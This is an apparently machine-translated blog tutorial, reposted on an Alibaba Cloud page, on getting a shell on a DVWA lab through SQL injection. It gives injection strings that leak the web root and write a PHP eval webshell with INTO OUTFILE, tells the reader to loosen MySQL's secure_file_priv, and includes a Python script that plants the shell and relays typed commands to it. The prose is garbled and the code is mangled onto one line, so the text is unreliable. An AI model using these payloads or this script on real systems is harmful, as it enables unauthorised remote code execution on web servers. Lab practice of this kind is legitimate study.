DVWA from injection to Getshell

Source: Internet
Author: User

Live your life well, and don't be too busy telling people what you're doing.

Recently in the review of what has been learned, I have re-built a dvwa to learn new ideas, write some simple scripts to practice the ability to write code.

It is well known that the harm of SQL injection is quite large, for each old driver, if found injection point and can be used, in addition to the pants of course is to guess the administrator's username and password, backstage upload Webshell, although these processes are not necessarily smooth, but the general process, There are all kinds of problems in the middle of the way, and after that, I learned to share them when I was better.

Today we are talking about using SQL injection vulnerability to write Webshell. When we find an injection bug, but can't find the background, what to do, if the database administrator permissions are relatively large, we can use SQL injection to the Web site to write to the shell.

Prerequisites for writing Webshell:

1.select into OutFile method available (allows export of files)

2. We need to know the absolute path where the site is located

3. We have sufficient authority to

First we identified the injection point, and then the absolute path of the site is exploded:

Enter in the input box, 1 ' union select ' x ', ' x ' into outfile ' xx '--Use the wrong SQL statement to make the database error and return the absolute path

Now that you have the absolute path to the site, the next step is to use SQL injection to write the shell, insert the 1 ' union select ' <?php @eval ($_get[' cmd ') in the input box?> "," Hello admin "into OutFile 'C:\ \phpstudy\phptutorial\WWW\dvwa\hello.php' (Note that it is two "\") Click Submit, we will see if the upload is successful

When we enter select ' xx ' into outfile ' xxxx/xx/xx '--you may encounter a situation:

Workaround: Locate the My.ini file in the last line and add a secure_file_prv= "/" to restart MySQL.

============================================================ attached herself to write the automated spicy Chicken Code ====================================== ===================================

#-*-Utf-8-*-import requestsimport reheaders = {' Accept ': ' text/html,application/xhtml+xml,application/xml;q=0.9, image/webp,image/apng,*/*;q=0.8 ', ' accept-encoding ': ' gzip, deflate ', ' accept-language ': ' zh-cn,zh;q=0.8 ', ' Cache-control ': ' max-age=0 ', ' Connection ': ' keep-alive ', ' Cookie ': ' Security=low; Phpsessid=pie6uqttjqtnadq1b5dp8640u1 ', ' Host ': ' 192.168.86.129 ', ' Referer ': ' http://192.168.86.129/dvwa/ Security.php ', ' upgrade-insecure-requests ': ' 1 ', ' user-agent ': ' mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/59.0.3071.115 safari/537.36 '}url = raw_input (' URL: ') print ' = ' *15,u ' Big Uncle Wait ', ' = ' *15payload = '%27+union+select+ ' <%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F> '%2c ' hello+admin ' + Into+outfile+%27c%3a%5c%5cphpstudy%5c%5cphptutorial%5c%5cwww%5c%5cdvwa%5c%5chello.php%27+--+&submit=submit # ' URL1 = Requests.get (url+payload,headers=headers) url2 = ' http://192.168.86.129/dvwa/hello.php ' url3 = Requests.get ( url2,headers=headers) Url4 = Re.findall (' <body> (.*?) </body> ', url3.text) if ' Hello ' in url3.text:print u ' Webshell has been written, the path is: http://192.168.86.129/dvwa/hello.php ' else :p rint u ' write failed ' Print U ' sir, go ahead! ' URL5 = ' http://192.168.86.129/dvwa/hello.php?cmd= ' url6 = raw_input () Url7 = Requests.get (url5+url6,headers=headers) Url8 = Re.findall (' <body> (. *?) </body> ', url7.content) print url7.content

  

To record their learned knowledge, in case forget, every day progress a little, mutual encouragement.

DVWA from injection to Getshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.